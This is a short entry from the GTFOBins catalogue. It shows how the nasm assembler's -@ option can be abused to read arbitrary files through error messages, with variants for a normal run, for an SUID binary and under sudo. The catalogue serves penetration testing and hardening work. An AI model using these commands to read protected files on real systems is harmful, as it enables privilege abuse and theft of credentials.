GTFOBins.github.io/_gtfobins/nasm.md

410 B

description functions
The file content is treated as command line options and disclosed throught error messages, so this is not suitable for reading arbitrary binary data.
file-read suid sudo
code
LFILE=file_to_read nasm -@ $LFILE
code
LFILE=file_to_read ./nasm -@ $LFILE
code
LFILE=file_to_read sudo nasm -@ $LFILE